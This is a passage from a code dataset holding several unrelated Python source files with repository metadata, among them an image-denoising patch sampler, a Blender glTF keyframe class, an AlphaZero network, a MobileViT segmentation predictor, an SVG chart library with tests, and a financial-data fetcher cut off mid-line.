total_time))\n print('merge time: {:5.1%}'.format( merge_time / total_time))\n print('\\n')\n print(\"These numbers shouldn't change unless things are being done more efficiently:\")\n print('load time / Ndata / Npix : {:.2e}'.format( load_time / Ndata / Npix))\n print('dot time / Ndata / Mrot / Npix : {:.2e}'.format( dot_time / Ndata / Mrot / Npix))\n print('merge time / Mrot / Npix : {:.2e}'.format( 100 * merge_time / Mrot / Npix))\n\n","repo_name":"andyofmelbourne/EMC","sub_path":"emc/update_I.py","file_name":"update_I.py","file_ext":"py","file_size_in_byte":11477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23297074281","text":"# -*- coding: utf-8 -*-\n# @project : Denoise-tensorflow\n# @Time : 2019-08-12 14:35 \n# @Author : ZhangXiao(sinceresky@foxmail.com)\n# @File : patch_util.py\nimport numpy as np\n\n\ndef get_patch_batch(batch_clean, batch_noisy, patch_size, dtype=np.uint8):\n # batch_size = batch_images.shape[0]\n channel = batch_clean.shape[3]\n # x = np.zeros((batch_size, patch_size, patch_size, channel), dtype=dtype)\n # y = np.zeros((batch_size, patch_size, patch_size, channel), dtype=dtype)\n # sample_id = 0\n batch_result_clean = []\n batch_result_noisy = []\n for id in range(len(batch_clean)):\n image_clean = batch_clean[id]\n image_noisy = batch_noisy[id]\n h, w, _ = image_clean.shape\n if h >= patch_size and w >= patch_size:\n i = np.random.randint(h 
- patch_size + 1)\n            j = np.random.randint(w - patch_size + 1)\n            image_patch_clean = image_clean[i:i + patch_size, j:j + patch_size]\n            image_patch_noisy = image_noisy[i:i + patch_size, j:j + patch_size]\n            batch_result_clean.append(image_patch_clean.reshape((patch_size, patch_size, channel)))\n            batch_result_noisy.append(image_patch_noisy.reshape((patch_size, patch_size, channel)))\n    return np.asarray(batch_result_clean), np.asarray(batch_result_noisy)\n","repo_name":"zhangxiao339/DeNoise-tensorflow","sub_path":"data_util/patch_util.py","file_name":"patch_util.py","file_ext":"py","file_size_in_byte":1301,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"48"} +{"seq_id":"26882085767","text":"\"\"\"\r\n\r\nValidation of a number: it must be a multiple of 10.\r\nimporte:> 33\r\nteclear un número múltiplo de 10\r\nimporte:> 55\r\nteclear un número múltiplo de 10\r\nimporte:> 230\r\n230, ok!\r\n\r\n4 de 50\r\n1 de 20\r\n1 de 10\r\n\"\"\"\r\nnumero = 1\r\nintentos = []\r\nwhile numero % 10 != 0:\r\n    cad = input('importe:> ')\r\n    if cad.isnumeric():\r\n        numero = int(cad)\r\n        if numero % 10 != 0:\r\n            intentos.append(numero)\r\n            print('teclear un número múltiplo de 10')\r\n    else:\r\n        print('Teclear solo números múltiplo de 10')\r\n        intentos.append(cad)\r\n\r\n# The number is valid \r\nprint(numero,' ok!')\r\nif len(intentos)!=0: \r\n    print('Te has confundido: ',len(intentos),'veces', intentos)\r\n\r\ntipos_billetes = [50,20,10]\r\nbilletes = dict()\r\nfor b in tipos_billetes:\r\n    if numero >= b:\r\n        numBilletes = numero // b\r\n        billetes[b] = numBilletes\r\n        numero %= b \r\n\r\n    if numero == 0: break\r\n\r\n\r\n# Print the result:\r\nfor b, cuenta in billetes.items():\r\n    print(cuenta,'de',b) \r\n","repo_name":"aldebarran22/python_django","sub_path":"CODIGO/prc_cajero.py","file_name":"prc_cajero.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"16510459897","text":"import typing\nimport bpy\nimport mathutils\nfrom ...com import gltf2_blender_math\n\nclass Keyframe:\n    def __init__(self, channels: typing.Tuple[bpy.types.FCurve], frame: float, bake_channel: typing.Union[str, None]):\n        self.seconds = frame / bpy.context.scene.render.fps\n        self.frame = frame\n        self.fps = bpy.context.scene.render.fps\n        self.__length_morph = 0\n        # Note: channels has some None items only for SK if some SK are not animated\n        if bake_channel is None:\n            self.target = [c for c in channels if c is not None][0].data_path.split('.')[-1]\n            if self.target != \"value\":\n                self.__indices = [c.array_index for c in channels]\n            else:\n                self.__indices = [i for i, c in enumerate(channels) if c is not None]\n                self.__length_morph = len(channels)\n        else:\n            if bake_channel == \"value\":\n                self.__length_morph = len(channels)\n            self.target = bake_channel\n            self.__indices = []\n            for i in range(self.get_target_len()):\n                self.__indices.append(i)\n\n\n        # Data holders for virtual properties\n        self.__value = None\n        self.__in_tangent = None\n        self.__out_tangent = None\n\n    def get_target_len(self):\n        length = {\n            \"delta_location\": 3,\n            \"delta_rotation_euler\": 3,\n            \"delta_rotation_quaternion\": 4,\n            \"delta_scale\": 3,\n            \"location\": 3,\n            \"rotation_axis_angle\": 4,\n            \"rotation_euler\": 3,\n            \"rotation_quaternion\": 4,\n            \"scale\": 3,\n            \"value\": self.__length_morph\n        }.get(self.target)\n\n        if length is None:\n            raise RuntimeError(\"Animations with target type '{}' are not 
supported.\".format(self.target))\n\n        return length\n\n    def __set_indexed(self, value):\n        # Sometimes blender animations only reference a subset of components of a data target. Keyframe should always\n        # contain a complete Vector/ Quaternion --> use the array_index value of the keyframe to set components in such\n        # structures\n        # For SK, must contain all SK values\n        result = [0.0] * self.get_target_len()\n        for i, v in zip(self.__indices, value):\n            result[i] = v\n        return result\n\n    def get_indices(self):\n        return self.__indices\n\n    def set_value_index(self, idx, val):\n        self.__value[idx] = val\n\n    def set_value_index_in(self, idx, val):\n        self.__in_tangent[idx] = val\n\n    def set_value_index_out(self, idx, val):\n        self.__out_tangent[idx] = val\n\n    def set_first_tangent(self):\n        self.__in_tangent = self.__value\n\n    def set_last_tangent(self):\n        self.__out_tangent = self.__value\n\n    @property\n    def value(self) -> typing.Union[mathutils.Vector, mathutils.Euler, mathutils.Quaternion, typing.List[float]]:\n        if self.target == \"value\":\n            return self.__value\n        return gltf2_blender_math.list_to_mathutils(self.__value, self.target)\n\n    @value.setter\n    def value(self, value: typing.List[float]):\n        self.__value = self.__set_indexed(value)\n\n    @value.setter\n    def value_total(self, value: typing.List[float]):\n        self.__value = value\n\n    @property\n    def in_tangent(self) -> typing.Union[mathutils.Vector, mathutils.Euler, mathutils.Quaternion, typing.List[float]]:\n        if self.__in_tangent is None:\n            return None\n        if self.target == \"value\":\n            return self.__in_tangent\n        return gltf2_blender_math.list_to_mathutils(self.__in_tangent, self.target)\n\n    @in_tangent.setter\n    def in_tangent(self, value: typing.List[float]):\n        self.__in_tangent = self.__set_indexed(value)\n\n    @property\n    def out_tangent(self) -> typing.Union[mathutils.Vector, mathutils.Euler, mathutils.Quaternion, typing.List[float]]:\n        if self.__out_tangent is None:\n            return None\n        if self.target == \"value\":\n            return self.__out_tangent\n        return gltf2_blender_math.list_to_mathutils(self.__out_tangent, self.target)\n\n    @out_tangent.setter\n    def out_tangent(self, value: typing.List[float]):\n        self.__out_tangent = self.__set_indexed(value)\n","repo_name":"KhronosGroup/glTF-Blender-IO","sub_path":"addons/io_scene_gltf2/blender/exp/animation/gltf2_blender_gather_keyframes.py","file_name":"gltf2_blender_gather_keyframes.py","file_ext":"py","file_size_in_byte":4248,"program_lang":"python","lang":"en","doc_type":"code","stars":1363,"dataset":"github-code","pt":"48"} +{"seq_id":"39101502305","text":"import numpy as np\nimport torch\nfrom PIL import Image\nfrom transformers import AutoImageProcessor\n\nfrom models.mobilevit import MobileVIT\n\n# Checkpoint of the model used in the project\nMODEL_CHECKPOINT = \"mmenendezg/mobilevit-fluorescent-neuronal-cells\"\n\n# Define the accelerator\nif torch.backends.mps.is_available():\n    DEVICE = torch.device(\"mps:0\")\n    ACCELERATOR = \"mps\"\nelif torch.cuda.is_available():\n    DEVICE = torch.device(\"cuda\")\n    ACCELERATOR = \"gpu\"\nelse:\n    DEVICE = torch.device(\"cpu\")\n    ACCELERATOR = \"cpu\"\n\n\ndef single_prediction(image):\n    # Instantiate the model from the checkpoint\n    mobilevit_model = MobileVIT()\n    mobilevit_model.to(DEVICE)\n    # Instantiate the image_processor\n    image_processor = AutoImageProcessor.from_pretrained(\n        MODEL_CHECKPOINT, do_reduce_labels=False\n    )\n    # Load the image\n    image = image.convert(\"RGB\")\n    # Convert the image to numpy array\n    np_image = np.asarray(image, 
dtype=np.uint8)\n # Preprocess the image and move the image to the GPU Device\n processed_image = image_processor(images=np_image, return_tensors=\"pt\")\n processed_image.to(DEVICE)\n # Make the prediction and resize the predicted mask\n logits = mobilevit_model.model(pixel_values=processed_image[\"pixel_values\"])\n post_processed_image = image_processor.post_process_semantic_segmentation(\n outputs=logits, target_sizes=[(np_image.shape[0], np_image.shape[1])]\n )\n # Process the mask\n mask = post_processed_image[0].data.cpu().numpy().astype(np.uint8) * 255\n mask = Image.fromarray(mask)\n\n return mask\n","repo_name":"mmenendezg/mobilevit-fluorescent-cells","sub_path":"src/tools/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":1615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42377169022","text":"import torch\nfrom torch import nn\nfrom torch.utils.data import DataLoader\n\nfrom self_play_dataset import SelfPlayDataset\nBOARD_SIZE = 9\n\nclass BasicBlock(nn.Module):\n def __init__(self, in_channels, out_channels):\n super().__init__()\n self.conv1 = nn.Conv2d(in_channels,\n out_channels,\n kernel_size=3,\n stride=1,\n padding=1)\n nn.init.kaiming_normal_(self.conv1.weight,\n mode=\"fan_out\",\n nonlinearity=\"relu\")\n self.bn1 = nn.BatchNorm2d(num_features=out_channels)\n self.relu1 = nn.ReLU()\n self.conv2 = nn.Conv2d(in_channels=out_channels,\n out_channels=out_channels,\n kernel_size=3,\n stride=1,\n padding=1)\n nn.init.kaiming_normal_(self.conv2.weight,\n mode=\"fan_out\",\n nonlinearity=\"relu\")\n self.bn2 = nn.BatchNorm2d(num_features=out_channels)\n self.relu2 = nn.ReLU()\n\n def forward(self, x):\n y = self.conv1(x)\n y = self.bn1(y)\n y = self.relu1(y)\n y = self.conv2(y)\n y = self.bn2(y)\n x = x + y\n x = self.relu2(x)\n return x\n\n\nclass ResNet(nn.Module):\n def __init__(self, in_channels, blocks, out_channels):\n super().__init__()\n self.conv1 = nn.Sequential(\n nn.Conv2d(in_channels,\n out_channels,\n kernel_size=3,\n stride=1,\n padding=1),\n nn.BatchNorm2d(out_channels),\n nn.ReLU(),\n )\n self.convs = nn.ModuleList([\n BasicBlock(in_channels=out_channels,\n out_channels=out_channels) for _ in range(blocks)\n ])\n\n def forward(self, x):\n x = self.conv1(x)\n for conv in self.convs:\n x = conv(x)\n return x\n\n\nclass AlphaZeroNet(nn.Module):\n def __init__(self,):\n super().__init__()\n # channels, height, width\n self.observation_tensor_shape = (10, BOARD_SIZE, BOARD_SIZE)\n in_channels, height, width = self.observation_tensor_shape\n channels = 32\n blocks = 10\n self.backbone = ResNet(in_channels, blocks, channels)\n\n # policy head\n self.policy_head_front = nn.Sequential(\n nn.Conv2d(in_channels=channels,\n out_channels=2,\n kernel_size=1),\n nn.BatchNorm2d(num_features=2),\n nn.ReLU(),\n )\n\n self.policy_head_end = nn.Sequential(\n nn.Linear(in_features=2 * height * width,\n out_features=BOARD_SIZE**2),\n nn.Softmax(dim=1)\n )\n\n # value head\n self.value_head_front = nn.Sequential(\n nn.Conv2d(in_channels=channels,\n out_channels=1,\n kernel_size=1),\n nn.BatchNorm2d(num_features=1),\n nn.ReLU(),\n )\n\n self.value_head_end = nn.Sequential(\n nn.Linear(in_features=height * width,\n out_features=channels),\n nn.ReLU(),\n nn.Linear(in_features=channels,\n out_features=1),\n nn.Tanh()\n )\n\n def forward(self, x):\n _, height, width = self.observation_tensor_shape\n x = self.backbone(x)\n # policy head\n p = self.policy_head_front(x)\n p = p.view(-1, 2 * height * 
width)\n        p = self.policy_head_end(p) \n        # value head\n        v = self.value_head_front(x)\n        v = v.view(-1, height * width)\n        v = self.value_head_end(v)\n        return p, v\n\nif __name__ == '__main__':\n    net = AlphaZeroNet()\n    dataset = SelfPlayDataset(capacity=1000, device='cpu')\n    dataset.load('./sgf/iteration_001')\n    dataloader = DataLoader(dataset=dataset, batch_size=16, shuffle=False)\n    optimizer = torch.optim.Adam(net.parameters(), lr=0.01, weight_decay=1e-4)\n\n    policy_criterion = nn.CrossEntropyLoss()\n    value_criterion = nn.MSELoss()\n    for features, policy_labels, value_labels in dataloader:\n        # features = features.to(device)\n        # policy_labels = policy_labels.to(device)\n        # value_labels = value_labels.to(device)\n        policy_logits, value_logits = net(features)\n        # print(policy_logits.shape, policy_labels.shape)\n        policy_loss = policy_criterion(policy_logits, policy_labels)\n        # print(value_logits.shape, value_labels.shape)\n        value_loss = value_criterion(value_logits.squeeze(), value_labels)\n        print('\\tpolicy_loss:', policy_loss.item())\n        print('\\tvalue_loss:', value_loss.item())\n        loss = policy_loss + value_loss\n        optimizer.zero_grad()\n        loss.backward()\n        optimizer.step()\n    torch.save(net, 'test3.pt')\n","repo_name":"Jerry-Github-Cloud/TCG_Project5-AlphaZero","sub_path":"network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":5031,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"37037217678","text":"def get_polymer(filename):\n    with open(filename) as f:\n        polymer = f.read()\n    polymer = polymer.replace('\\n','')\n    return(polymer)\n\ndef stack_reduction(polymer):\n    stack = []\n    for c in polymer:\n        if stack and stack[-1] == c.swapcase():\n            stack.pop()\n        else:\n            stack.append(c)\n    new_polymer = ''.join(stack)\n    return(new_polymer)\n\ndef part1(filename):\n    polymer = get_polymer(filename)\n    print('Part 1 Answer:', len(stack_reduction(polymer)))\n\ndef part2(filename):\n    polymer = get_polymer(filename)\n    from string import ascii_lowercase\n    shortest = min([len(stack_reduction(polymer.replace(c,'').replace(c.upper(),''))) for c in ascii_lowercase])\n    print('Part 2 Answer:', shortest)\n\ninput_file = '2018/inputs/2018_05_input.txt'\npart1(input_file)\npart2(input_file)\n","repo_name":"MattMichaud/AoC","sub_path":"2018/2018_05.py","file_name":"2018_05.py","file_ext":"py","file_size_in_byte":829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72236853587","text":"#!/usr/bin/python\nfrom __future__ import division\nimport copy\nimport fileio\nimport unittest\n\n\ndef round_point(point):\n    return [int(point[0]), int(point[1])]\n\n\ndef scale_point(point, k):\n    return [k[0]*point[0], k[1]*point[1]]\n\n\ndef shift_point(point, offset):\n    return [point[0]+offset[0], point[1]+offset[1]]\n\n\ndef round_points(points):\n    return [round_point(p) for p in points]\n\n\ndef scale_points(points, k):\n    return [scale_point(p, k) for p in points]\n\n\ndef shift_points(points, offset):\n    return [shift_point(p, offset) for p in points]\n\n\ndef get_square():\n    return [[0, 0], [1, 0], [1, 1], [0, 1], [0, 0]]\n\n\ndef get_rectangular(w, h):\n    return scale_points(get_square(), [w, h])\n\n\ndef get_color(text):\n    t = {\n        'white': '#fff',\n        'black': '#000',\n        'red': '#f00',\n        'green': '#0f0',\n        'blue': '#00f'\n    }\n    return t.get(text, text)\n\n\ndef close_points(points):\n    res = points[:]\n    if len(res) < 1:\n        return res\n    first = res[0]\n    last = res[-1]\n    res.append([last[0], 0])\n    
res.append([first[0], 0])\n res.append(first)\n return res\n\n\nclass BoundingBox:\n\n def __init__(self, point=None):\n self.left_bottom = None\n self.right_top = None\n self.include(point)\n\n def include(self, point):\n if self.left_bottom is None or self.right_top is None:\n self.left_bottom = point[:]\n self.right_top = point[:]\n return\n\n self.left_bottom[0] = min(self.left_bottom[0], point[0])\n self.left_bottom[1] = min(self.left_bottom[1], point[1])\n self.right_top[0] = max(self.right_top[0], point[0])\n self.right_top[1] = max(self.right_top[1], point[1])\n\n def width(self):\n return self.right_top[0] - self.left_bottom[0]\n\n def height(self):\n return self.right_top[1] - self.left_bottom[1]\n\n\nclass Chart:\n\n def __init__(self, width=650, height=75,\n padding_top=10, padding_bottom=20,\n padding_left=20, padding_right=40,\n inverseX=False,\n xlabels=[], ylabels=[]):\n self.width = width\n self.height = height\n self.padding_top = padding_top\n self.padding_bottom = padding_bottom\n self.padding_left = padding_left\n self.padding_right = padding_right\n self.inverseX = inverseX\n self.traces = []\n self.texts = []\n self.canvas = BoundingBox([0, 0])\n self.xlabels = xlabels\n self.ylabels = ylabels\n self.is_axes_on_top = False\n\n # self.add_frame() # TODO: remove\n self.add_background()\n self.add_labels()\n self.add_axes()\n\n def set_minimal_canvas(self, point1, point2):\n self.canvas.include(point1)\n self.canvas.include(point2)\n\n def add_frame(self):\n points = get_rectangular(self.width-2, self.height-2)\n points = shift_points(points, [1, 1])\n data = {}\n data['points'] = points\n data['atr'] = {}\n data['atr']['fill'] = 'none'\n data['atr']['stroke-width'] = 1\n data['atr']['stroke'] = '#ddd'\n data['atr']['shape-rendering'] = 'crispEdges'\n self.traces.append(data)\n\n def add_background(self):\n w = self.width - self.padding_left - self.padding_right\n h = self.height - self.padding_top - self.padding_bottom\n points = get_rectangular(w, h)\n padding = [self.padding_left, self.padding_bottom]\n points = shift_points(points, padding)\n data = {}\n data['points'] = points\n data['atr'] = {}\n data['atr']['fill'] = get_color('white')\n self.traces.append(data)\n\n def add_axes(self):\n d = 3\n w = self.width - self.padding_left - self.padding_right\n h = self.height - self.padding_top - self.padding_bottom\n padding = [self.padding_left, self.padding_bottom]\n\n data = {}\n data['atr'] = {}\n data['atr']['fill'] = 'none'\n data['atr']['stroke-width'] = 1\n data['atr']['stroke'] = '#999'\n data['atr']['shape-rendering'] = 'crispEdges'\n\n dx0 = 1 if self.inverseX else d\n dx1 = d if self.inverseX else 0\n\n # X top\n data = copy.deepcopy(data)\n points = [[-dx0, h], [w+dx1, h]]\n points = shift_points(points, padding)\n data['points'] = points\n self.traces.append(data)\n\n # X bottom\n data = copy.deepcopy(data)\n points = [[-dx0, 0], [w+dx1, 0]]\n points = shift_points(points, padding)\n data['points'] = points\n self.traces.append(data)\n\n # Y left\n data = copy.deepcopy(data)\n points = [[0, -d], [0, h]]\n points = shift_points(points, padding)\n data['points'] = points\n self.traces.append(data)\n\n # Y right\n data = copy.deepcopy(data)\n points = [[w, -d], [w, h]]\n points = shift_points(points, padding)\n data['points'] = points\n self.traces.append(data)\n\n def add_labels(self):\n w = self.width - self.padding_left - self.padding_right\n h = self.height - self.padding_top - self.padding_bottom\n padding = [self.padding_left, self.padding_bottom]\n\n 
data = {}\n data['atr'] = {}\n data['atr']['fill'] = 'none'\n data['atr']['stroke-width'] = 1\n data['atr']['stroke'] = '#ddd'\n data['atr']['shape-rendering'] = 'crispEdges'\n if self.is_axes_on_top:\n data['atr']['stroke-dasharray'] = '1, 5'\n\n text = {}\n text['atr'] = {}\n text['atr']['font-family'] = 'Verdana'\n text['atr']['font-size'] = 10\n text['atr']['fill'] = '#777'\n\n yn = len(self.ylabels)\n step = h / (yn-1)\n for i in xrange(0, yn):\n data = copy.deepcopy(data)\n y = i * step\n points = [[0, y], [w, y]]\n points = shift_points(points, padding)\n data['points'] = points\n self.traces.append(data)\n\n x = w+5 if self.inverseX else -5\n\n text = copy.deepcopy(text)\n text['text'] = self.ylabels[i]\n point = shift_point([x, y-3], padding)\n point = self.to_real_coords(point)\n text['atr']['x'] = point[0]\n text['atr']['y'] = point[1]\n text['atr']['text-anchor'] = 'start' if self.inverseX else 'end'\n self.texts.append(text)\n\n xn = len(self.xlabels)\n step = w / (xn-1)\n for i in xrange(0, xn):\n data = copy.deepcopy(data)\n x = i * step\n points = [[x, 0], [x, h]]\n points = shift_points(points, padding)\n data['points'] = points\n self.traces.append(data)\n\n text = copy.deepcopy(text)\n j = xn - i - 1 if self.inverseX else i\n text['text'] = self.xlabels[j]\n point = shift_point([x, -15], padding)\n point = self.to_real_coords(point)\n text['atr']['x'] = point[0]\n text['atr']['y'] = point[1]\n text['atr']['text-anchor'] = 'middle'\n self.texts.append(text)\n\n def add(self, ys, xs=None, stroke_width=1, stroke='black',\n fill='none', stroke_dash=False, drop=None):\n ny = len(ys)\n if xs is None:\n xs = range(0, ny)\n n = min(len(xs), ny)\n xs = xs[:n]\n ys = ys[:n]\n\n points = [[xs[i], ys[i]] for i in xrange(0, n)]\n\n drops = []\n if drop is not None and len(points) >= 1:\n first = points[0]\n last = points[-1]\n drops.append(first)\n drops.append([first[0], 0])\n drops.append([last[0], 0])\n drops.append(last)\n\n if fill != 'none':\n self.is_axes_on_top = True\n points = close_points(points)\n\n for p in points:\n self.canvas.include(p)\n\n data = {}\n data['canvas'] = points\n data['atr'] = {}\n data['atr']['fill'] = fill\n data['atr']['stroke-width'] = stroke_width\n data['atr']['stroke'] = get_color(stroke)\n if stroke_dash:\n if stroke_dash is True:\n stroke_dash = '10, 5'\n data['atr']['stroke-dasharray'] = stroke_dash\n self.traces.append(data)\n\n if len(drops) > 0:\n data = {}\n data['canvas'] = drops\n data['atr'] = {}\n data['atr']['fill'] = 'none'\n data['atr']['stroke-width'] = 1\n data['atr']['stroke'] = get_color(drop)\n self.traces.append(data)\n\n def canvas_to_points(self, canvas):\n w = self.width - self.padding_left - self.padding_right\n h = self.height - self.padding_top - self.padding_bottom\n\n xk = w\n yk = h\n if self.canvas.width():\n xk /= self.canvas.width()\n if self.canvas.height():\n yk /= self.canvas.height()\n\n if self.inverseX:\n canvas = shift_points(canvas, [-self.canvas.width(), 0])\n canvas = scale_points(canvas, [-1, 1])\n points = scale_points(canvas, [xk, yk])\n points = round_points(points)\n padding = [self.padding_left, self.padding_bottom]\n points = shift_points(points, padding)\n return points\n\n def to_real_coords(self, point):\n point = shift_point(point, [0, -self.height])\n point = scale_point(point, [1, -1])\n return point\n\n def render_points(self, points):\n points = [self.to_real_coords(p) for p in points]\n\n coords = ['{0},{1}'.format(p[0], p[1]) for p in points]\n\n pts = ' '.join(coords)\n return 
'\\tpoints=\"{0}\"'.format(pts)\n\n def render_cirle(self, point, color='red'):\n p = self.to_real_coords(point)\n return '<circle cx=\"{0}\" cy=\"{1}\" r=\"{2}\" fill=\"{3}\"/>'.format(\n p[0], p[1], 1, color)\n\n def render_trace(self, trace):\n res = []\n res.append('<polyline')\n\n canvas = trace.get('canvas')\n if canvas:\n trace['points'] = self.canvas_to_points(canvas)\n\n points = trace.get('points')\n if points:\n res.append(self.render_points(points))\n\n atr = trace.get('atr')\n if atr:\n for a in atr:\n res.append('\\t{0}=\\\"{1}\\\"'.format(a, atr[a]))\n\n res.append('/>')\n\n # for p in points:\n # res.append(self.render_cirle(p, color))\n\n return res\n\n def render_text(self, text):\n res = []\n res.append('<text')\n\n atr = text.get('atr')\n if atr:\n for a in atr:\n res.append('\\t{0}=\\\"{1}\\\"'.format(a, atr[a]))\n\n res.append('>')\n res.append(str(text['text']))\n res.append('</text>')\n return res\n\n def render(self):\n if self.is_axes_on_top:\n self.add_labels()\n self.add_axes()\n\n svg = []\n svg.append('<svg>')\n for t in self.traces:\n svg.extend(self.render_trace(t))\n\n for t in self.texts:\n svg.extend(self.render_text(t))\n svg.append('</svg>')\n return svg\n\n def render_to_svg(self, filepath):\n fileio.write_lines(self.render(), filepath)\n\n\n# def main():\n# xlabels = [0, 2, 4, 6, 8, 10, '12 hours']\n# ylabels = ['0 %', '50 %', '100 %']\n# chart = Chart(inverseX=True, xlabels=xlabels, ylabels=ylabels,\n# height=400)\n\n# #import random\n# #ys = [random.randrange(0, 100) for i in xrange(200)]\n# # c90c28 dark red\n# # 2e7eb3 blue\n# # fa730c orange\n# # 4aa635 green\n\n# color = '#2e7eb3'\n# ys = [10, 60, 60]\n# xs = [10, 20, 30]\n# chart.add(xs=xs, ys=ys, stroke=color, fill=color)\n\n# color = '#4aa635'\n# ys = [40, 70, 100, 98]\n# xs = [30, 40, 50, 60]\n# chart.add(xs=xs, ys=ys, stroke=color, fill=color)\n\n# chart.render_to_svg('test.svg')\n\n\nclass MyTest(unittest.TestCase):\n\n def test_round_point(self):\n self.assertEqual(round_point([2.1, 4.1]), [2, 4])\n self.assertEqual(round_point([2.9, 4.9]), [2, 4])\n\n def test_scale_point(self):\n self.assertEqual(scale_point([2, 4], [1, 0]), [2, 0])\n self.assertEqual(scale_point([2, 4], [0, 1]), [0, 4])\n self.assertEqual(scale_point([2, 4], [2, 2]), [4, 8])\n self.assertEqual(scale_point([2, 4], [-2, -2]), [-4, -8])\n\n def test_shift_point(self):\n self.assertEqual(shift_point([2, 4], [1, 0]), [3, 4])\n self.assertEqual(shift_point([2, 4], [1, 1]), [3, 5])\n self.assertEqual(shift_point([2, 4], [0, 1]), [2, 5])\n\n def test_round_points(self):\n self.assertEqual(round_points([[2.1, 4.1]]), [[2, 4]])\n self.assertEqual(round_points([[2.9, 4.9]]), [[2, 4]])\n\n def test_scale_points(self):\n self.assertEqual(scale_points([[2, 4]], [1, 0]), [[2, 0]])\n self.assertEqual(scale_points([[2, 4]], [0, 1]), [[0, 4]])\n self.assertEqual(scale_points([[2, 4]], [2, 2]), [[4, 8]])\n self.assertEqual(scale_points([[2, 4]], [-2, -2]), [[-4, -8]])\n\n def test_shift_points(self):\n self.assertEqual(shift_points([[2, 4]], [1, 0]), [[3, 4]])\n self.assertEqual(shift_points([[2, 4]], [1, 1]), [[3, 5]])\n self.assertEqual(shift_points([[2, 4]], [0, 1]), [[2, 5]])\n\n def test_get_rectangular(self):\n self.assertEqual(get_rectangular(1, 1), get_square())\n self.assertEqual(get_rectangular(2, 1),\n [[0, 0], [2, 0], [2, 1], [0, 1], [0, 0]])\n\n def test_get_color(self):\n self.assertEqual(get_color('white'), '#fff')\n self.assertEqual(get_color('black'), '#000')\n\n def test_render1(self):\n xlabels = []\n ylabels = []\n 
chart = Chart(xlabels=xlabels, ylabels=ylabels)\n        self.assertEqual(chart.render(), fileio.read_lines(\n            'batterym/test/chart/render1.svg'))\n\n    def test_render2(self):\n        xlabels = [0, 2, 4, 6, 8, 10, '12 hours']\n        ylabels = ['0 %', '50 %', '100 %']\n        chart = Chart(xlabels=xlabels, ylabels=ylabels)\n        self.assertEqual(chart.render(), fileio.read_lines(\n            'batterym/test/chart/render2.svg'))\n\n    def test_render3(self):\n        xlabels = [0, 2, 4, 6, 8, 10, '12 hours']\n        ylabels = ['0 %', '50 %', '100 %']\n        chart = Chart(xlabels=xlabels, ylabels=ylabels)\n        color = 'red'\n        ys = [10, 60, 60]\n        xs = [10, 20, 30]\n        chart.add(xs=xs, ys=ys, stroke=color, fill=color)\n        self.assertEqual(chart.render(), fileio.read_lines(\n            'batterym/test/chart/render3.svg'))\n\n    def test_render4(self):\n        xlabels = [0, 2, 4, 6, 8, 10, '12 hours']\n        ylabels = ['0 %', '50 %', '100 %']\n        chart = Chart(xlabels=xlabels, ylabels=ylabels)\n        color = 'red'\n        ys = [10, 60, 60]\n        chart.add(ys=ys, stroke=color, fill=color)\n        self.assertEqual(chart.render(), fileio.read_lines(\n            'batterym/test/chart/render4.svg'))\n\n    def test_render5(self):\n        xlabels = [0, 2, 4, 6, 8, 10, '12 hours']\n        ylabels = ['0 %', '50 %', '100 %']\n        chart = Chart(xlabels=xlabels, ylabels=ylabels)\n        color = 'red'\n        ys = [10, 60, 60]\n        chart.add(ys=ys, stroke=color, stroke_dash=True)\n        self.assertEqual(chart.render(), fileio.read_lines(\n            'batterym/test/chart/render5.svg'))\n\n    def test_render6(self):\n        xlabels = [0, 2, 4, 6, 8, 10, '12 hours']\n        ylabels = ['0 %', '50 %', '100 %']\n        chart = Chart(xlabels=xlabels, ylabels=ylabels, inverseX=True)\n        color = 'red'\n        ys = [10, 60, 60]\n        chart.add(ys=ys, stroke=color, fill=color)\n        self.assertEqual(chart.render(), fileio.read_lines(\n            'batterym/test/chart/render6.svg'))\n\n# if __name__ == '__main__':\n#     # main()\n#     unittest.main()\n","repo_name":"maks-a/batterym","sub_path":"batterym/chart.py","file_name":"chart.py","file_ext":"py","file_size_in_byte":15827,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"48"} +{"seq_id":"5281197462","text":"\nimport pandas as pd\nimport datetime\nimport jqdatasdk as jq\nfrom functools import partial\nimport os\n\n\nINDEX_CODES = ['000016.XSHG', '000300.XSHG', '000905.XSHG', '000852.XSHG', '000688.XSHG', '399001.XSHE',\n               '399006.XSHE', '000001.XSHG']\n\nINDEX_NAMES = {\n    '000016.XSHG': 'sz50',\n    '000300.XSHG': 'hs300',\n    '000905.XSHG': 'zz500',\n    '000852.XSHG': 'zz1000',\n    '000688.XSHG': 'kc50',\n    '399001.XSHE': 'szcz',\n    '399006.XSHE': 'cybz',\n    '000001.XSHG': 'szzs'\n}\njq.auth(os.environ['JQ_USER'],os.environ['JQ_PASSWD'])\n\n\nget_all_securities = jq.get_all_securities\nget_trade_days = jq.get_trade_days\n\n\ndef get_security_info(**kwargs):\n    instruments = get_all_securities()\n    instruments.index.name = 'code'\n    instruments = instruments.reset_index()\n    return instruments\n\ndef get_industry_cons(start_date=None, end_date=None, trade_date=None, name='sw_l1'):\n    ############ industry constituents ##########\n    if trade_date is not None:\n        start_date = trade_date\n        end_date = trade_date\n\n    all_trade_dates = jq.get_trade_days(\n        start_date=start_date, end_date=end_date)\n    if all_trade_dates.__len__() == 0:\n        return pd.DataFrame()\n\n    def __get_daily_cons(ind, date, ind_names):\n        ind_name = ind_names[ind]\n        ind_cons = jq.get_industry_stocks(ind, date=date)\n        ind_names = [ind_name] * len(ind_cons)\n        dates_index = [date] * len(ind_cons)\n        df = pd.DataFrame(\n            {'date': dates_index, 'code': ind_cons, 'industry_name': 
